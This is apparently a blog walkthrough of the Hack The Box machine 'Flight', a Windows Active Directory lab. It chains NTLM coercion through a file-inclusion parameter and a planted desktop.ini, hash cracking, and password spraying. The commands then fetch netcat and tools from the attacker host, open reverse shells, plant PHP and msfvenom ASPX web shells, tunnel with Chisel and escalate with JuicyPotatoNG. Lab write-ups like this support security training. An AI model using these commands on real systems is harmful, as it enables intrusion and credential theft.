Flight | Hack The Box Walkthrough | OSCP Style

Flight is a hard-rated Windows machine that does an excellent job of chaining together several real-world Active Directory attack…

Flight is a hard-rated Windows machine that does an excellent job of chaining together several real-world Active Directory attack primitives. There is no single “magic” exploit here. Instead, the box rewards methodical enumeration and the patient abuse of NTLM authentication coercion.

Reconnaissance

As always, we begin with a full TCP port scan to understand the attack surface:

nmap -p- --open -sS -sV -sC --min-rate 5000 -vvv -n 10.10.11.187 -oN result.txt

Nmap reveals a Windows DC and the flight.htb domain.

Virtual host discovery

A default-looking site on port 80 is a strong hint that additional virtual hosts may be served from the same IP. We fuzz the Host header to enumerate them, filtering out the default response length (154 lines) to reduce noise:

wfuzz -c -z file,subdomains-top1million-5000.txt -u "http://flight.htb/" -H "Host: FUZZ.flight.htb" --hl 154

wfuzz discovers the “school” virtual host.

A single hit stands out: school (HTTP 2). We add school.flight.htb to our hosts file and browse to the new Aviation School application.

Local DNS resolution

Because the application relies on name-based virtual hosting, we map the discovered hostname to the target IP in our /etc/hosts file so our browser and tooling resolve it correctly:

Mapping flight.htb (and later school.flight.htb) in /etc/hosts.

Initial Foothold

The Aviation School navigation uses a tell-tale URL structure: index.php?view=… . Whenever a view= , page= or file= parameter feeds the application, Local File Inclusion / path traversal belongs at the top of our test list. We try the canonical payload:


http://school.flight.htb/index.php?view=../../../../../../etc/hosts

The application responds with “Suspicious Activity Blocked! Incident will be reported.” input sanitisation is stripping or rejecting traversal sequences.

Direct path traversal is detected and blocked.

Probing how the parameter is sanitised.

Confirming which payloads the filter accepts vs. rejects.

A blocked local read does not mean the parameter is safe. On Windows, PHP’s file functions happily accept UNC paths ( \host\share ). Instead of reading a local file, we point the parameter at a resource on our own attacker machine. When the server tries to open that SMB share it will authenticate to us over NTLM, leaking the NetNTLMv2 hash of the web service account.

First, we start Responder on the tunnel interface to catch the inbound authentication:

sudo responder -I tun0

Responder listening on tun0 for NTLM authentication.

We trigger the coercion by pointing view= at a non-existent share on our box:

http://school.flight.htb/index.php?view=//10.10.14.9/noexiste

Abusing the view= parameter with a UNC path to coerce authentication.

Responder immediately captures a NetNTLMv2 hash for the user svc_apache.

We crack it with Hashcat mode 5600 (NetNTLMv2) and the rockyou wordlist:

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -force

Hashcat recovers the svc_apache password.

Lateral Movement

We confirm the credentials over SMB:

crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'

svc_apache credentials validated over SMB.

Then we enumerate shares and users, the two inputs that drive the next phase:

crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' --shares
crackmapexec smb 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13' --users

Enumerating SMB shares.

Enumerating domain users (saved to users.txt).

Password reuse is a common AD misconfiguration. We spray the recovered password against every enumerated user:

crackmapexec smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' - continue-on-success

The spray reveals a second account sharing the same password: S.Moon.

Password spray identifies S.Moon as a reuse victim.

crackmapexec smb 10.10.11.187 -u 'S.Moon' -p 'S@Ss!K@*t13' - shares

S.Moon has WRITE access to the Shared share.

We browse the Users share and grab an existing desktop.ini as a reference:

smbclient -U 'S.Moon' //10.10.11.187/Users 
smb> get desktop.ini

Browsing the Users share with smbclient.

Retrieving a reference desktop.ini.

desktop.ini controls folder appearance in Explorer. If we set IconResource to a UNC path pointing at us, any user who simply browses the folder will have Windows fetch the icon, coercing their NTLM authentication to our box:

[.ShellClassInfo] 
IconResource=\\10.10.14.9\crypto\

Malicious desktop.ini with a UNC IconResource.

We stand up an Impacket SMB server to capture the authentication:

impacket-smbserver crypto . -smb2support

Impacket SMB server waiting for inbound auth.

And upload the file into the writable share:

smbclient -U 'S.Moon' //10.10.11.187/Shared
smb> put desktop.ini

Planting the malicious desktop.ini in the Shared share.

Shortly after, a privileged user browses the share and our SMB server captures a NetNTLMv2 hash for C.Bum.

C.Bum’s NetNTLMv2 hash captured.

hashcat -a 0 -m 5600 hash2.txt /usr/share/wordlists/rockyou.txt --force

Hashcat recovers C.Bum’s password.

Web Shell & Service-to-User Pivot

crackmapexec smb 10.10.11.187 -u 'C.Bum' -p 'Tikkycoll_431012284' --shares

C.Bum credentials validated.

C.Bum has READ/WRITE on the Web share.

The Web share maps to the web roots of both sites, so we can drop a web shell straight into a directory served by Apache/PHP:

smbclient -U 'C.Bum' //10.10.11.187/Web
smb> put webshell.php

Read/write access across both web roots.

Uploading the PHP web shell.

Browsing to the uploaded shell gives command execution as the svc_apache service account. We use it to pull Netcat and fire a reverse shell:

curl hxxp://10.10.14.9/nc64[.]exe -O nc[.]exe 
nc64[.]exe -e powershell 10.10.14.9 9292

Web shell command execution.

Confirming the execution context.

Staging nc64[.]exe on the target.

PowerShell reverse shell as svc_apache.

Interactive shell established.

The web shell only yields the service account. Because we cracked C.Bum’s password, we use RunasCs to spawn a process as that interactive user:

curl hxxp://10.10.14.9/RunasCs[.]exe -O RunasCs[.]exe .\RunasCs[.]exe C.Bum Tikkycoll_431012284 powershell -r 10.10.14.9:9090

Staging RunasCs[.]exe.

Running PowerShell as C.Bum via RunasCs.

With a nc -nlvp 9090 listener ready, we receive a shell as C.Bum and read the user flag.

Shell as C.Bum.

user.txt captured.

Internal Pivot: Hidden IIS Site via Chisel

Enumerating the filesystem as C.Bum, we find an inetpub directory, evidence of an IIS site separate from the two Apache sites. We confirm it listens only internally:

netstat -oa
dir

The inetpub directory reveals an additional internal site.

Port 8000 is listening on localhost: invisible to external Nmap.

We set up a reverse port-forward with Chisel. Server on our machine:

chisel server --reverse --port 9999

Client on the compromised host, forwarding the target’s internal 8000 back to us:

curl hxxp://10.10.14.9/chisel[.]exe -O chisel[.]exe
.\chisel[.]exe client 10.10.14.9:9999 R:8000:127.0.0.1:8000

Staging chisel[.]exe on the target.

Chisel server in reverse mode on the attacker box.

The tunnel is established.

Browsing http://127.0.0.1:8000 now renders the internal IIS application through the tunnel.

The tunnel is established.

Internal IIS site reachable through Chisel.

ASPX web shell on IIS

The internal site exposes a directory with write access. We confirm by uploading a harmless .txt file and seeing it served back. Knowing the server is IIS, we generate an ASPX reverse shell:

Uploaded file served back by IIS.

Confirming write access with a test upload.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=3730 -f aspx > shell.aspx

Generating the ASPX payload with msfvenom.

We place it in the writable directory and trigger it:

wget http://10.10.14.9/shell.aspx -O shell.aspx

Deploying shell.aspx.

Browsing the payload triggers execution.

Shell as the IIS application-pool service account.

Privilege Escalation

whoami /priv

SeImpersonatePrivilege enabled on the IIS service account.

SeImpersonatePrivilege is Enabled: the gateway to the “Potato” family of local privilege-escalation attacks that abuse Windows token impersonation to elevate a service account to SYSTEM.

We transfer JuicyPotatoNG and use it to launch a command as SYSTEM:

curl hxxp://10.10.14.9/JuicyPotatoNG[.]exe -O JuicyPotatoNG[.]exe
.\JuicyPotatoNG[.]exe -t * -p "C:\Windows\System32\cmd.exe" -i

Staging JuicyPotatoNG[.]exe.

Token impersonation succeeds: elevating to SYSTEM.

We are now NT AUTHORITY\SYSTEM: full control of the host. The root flag is ours and the box is owned.

root.txt captured as NT AUTHORITY\SYSTEM.

References

If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.